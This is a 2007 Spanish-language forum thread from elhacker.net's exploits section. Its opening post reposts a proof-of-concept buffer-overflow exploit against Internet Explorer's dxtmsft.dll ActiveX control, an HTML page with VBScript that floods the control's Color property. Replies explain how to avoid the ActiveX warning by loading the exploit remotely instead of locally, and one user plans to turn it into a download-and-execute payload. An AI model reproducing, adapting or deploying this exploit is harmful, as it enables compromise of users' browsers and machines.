Bienvenido(a),
Visitante
. Por favor
Ingresar
o
Registrarse
¿Perdiste tu
email de activación?
.
07 Octubre 2008, 19:25
Foro de elhacker.net
Seguridad Informática
Bugs y Exploits
(Moderadores:
sirdarckcat
,
berz3k
)
Internet Explorer dxtmsft.dll Buffer Overflow - 0day
0 Usuarios y 1 Visitante están viendo este tema.
Páginas:
[
1
]
Autor
Tema: Internet Explorer dxtmsft.dll Buffer Overflow - 0day (Leído 461 veces)
yeikos
Colaborador
Desconectado
Mensajes: 1.363
Internet Explorer dxtmsft.dll Buffer Overflow - 0day
«
en:
01 Agosto 2007, 02:16 »
Citar
<object classid="clsid:421516C1-3CF8-11D2-952A-00C04FA34F05" id="Chroma"></object>
<input language=VBScript onclick=jojo() type=button value="Click here to start Exploit"><script language='vbscript'>
Sub jojo
buff = String(999999, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaA")
get_EDX = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbcccccccccccccddddddddddeee"
buff1 = String(999999, "BBBBBBBBBBBBBBBBBBBBBBBBBBBBbb")
egg = buff + get_EDX + buff1 + scode
Chroma.Color = egg
End Sub
</script>
Fuente:
http://www.milw0rm.com/exploits/4251
En línea
EvilGoblin
Conectado
Mensajes: 861
LAIN IS LAIN
Re: Internet Explorer dxtmsft.dll Buffer Overflow - 0day
«
Respuesta #1 en:
01 Agosto 2007, 14:16 »
y..... se puede modificar para ejecutar la calculadora de Windows? =P (como ejemplo)
Salto la proteccion de windows para la ejecucion de Activex =(
luego de eso funciona...
pero xP hay q habilitar 2 veces... el primero la franga amarilla que apare arriba.. y depsues te aparece un mensaje de "ESTA REALMENTE SEGURO???"
xD
^^
«
Última modificación: 01 Agosto 2007, 14:21 por evilgoblin
»
En línea
Experimental Serials Lain
sirdarckcat
sdc
Moderador
Conectado
Mensajes: 4.641
HAND
Re: Internet Explorer dxtmsft.dll Buffer Overflow - 0day
«
Respuesta #2 en:
01 Agosto 2007, 21:36 »
no hagas el intento en local, hazlo remoto.. iexplorer es mas paranoico en local que en remoto..
Saludos!!
En línea
Leer reglas
Mis páginas web:
-
mi web
,
my blog
,
my web
http://ejemplode.com/
,
http://sybsecurity.com/
EvilGoblin
Conectado
Mensajes: 861
LAIN IS LAIN
Re: Internet Explorer dxtmsft.dll Buffer Overflow - 0day
«
Respuesta #3 en:
01 Agosto 2007, 21:51 »
Tienes Razon!! xD
Remotamente no me aviso de ningun Control Activex =)
ahora leere como hacer para ejecutar la calculadora...
o algun DOWNLOAD & EXECUTE ^^
si lo logro lo posteo ^^..
En línea
Experimental Serials Lain
Páginas:
[
1
]
Ir a:
Por favor selecciona un destino:
-----------------------------
Forums Generales
-----------------------------
=> Dudas Generales
=> Sugerencias y dudas sobre el Foro
=> Foro Libre
===> Noticias
===> Series/Películas/Música
-----------------------------
Seguridad Informática
-----------------------------
=> Hacking Avanzado
===> Hacking Linux/Unix
===> Hacking Mobile
===> Hacking Básico
=> Hacking Wireless
===> Wireless en Windows
===> Wireless en Linux
===> Materiales y equipos
=> Bugs y Exploits
=> Seguridad
===> Criptografía
=> Análisis y Diseño de Malware
=> Desafíos - Wargames
===> WarZone
-----------------------------
Programación
-----------------------------
=> Desarrollo Web
===> PHP
=> Programación General
===> Ejercicios
===> Ingeniería Inversa
===> .NET
===> Scripting
===> Java
=> Programación C/C++
=> Programación VB
-----------------------------
Sistemas Operativos
-----------------------------
=> Windows
=> GNU/Linux
===> Mac OS X, BSD
-----------------------------
Informática
-----------------------------
=> Diseño Gráfico
===> Fotografía
===> Battle Arts
===> Galería de Arte
=> Multimedia
===> PostProducción de Audio y Vídeo Digital
=> Software
===> Grabadoras
=> Hardware
===> Electrónica
=> Juegos y Consolas
=> Tutoriales - Documentación
-----------------------------
Comunicaciones
-----------------------------
=> Redes
=> Telefonía Móvil
=> Chats; IRC y Messengers
hard-h2o modding
Foros de ayuda
Yashira.org
Videojuegos
indetectables.net
Noticias Informatica
Seguridad Informática
ADSL
Foros en español
eNYe Sec
Todas las webs afiliadas están libres de publicidad engañosa.
Powered by SMF 1.1.6
|
SMF © 2006-2008, Simple Machines LLC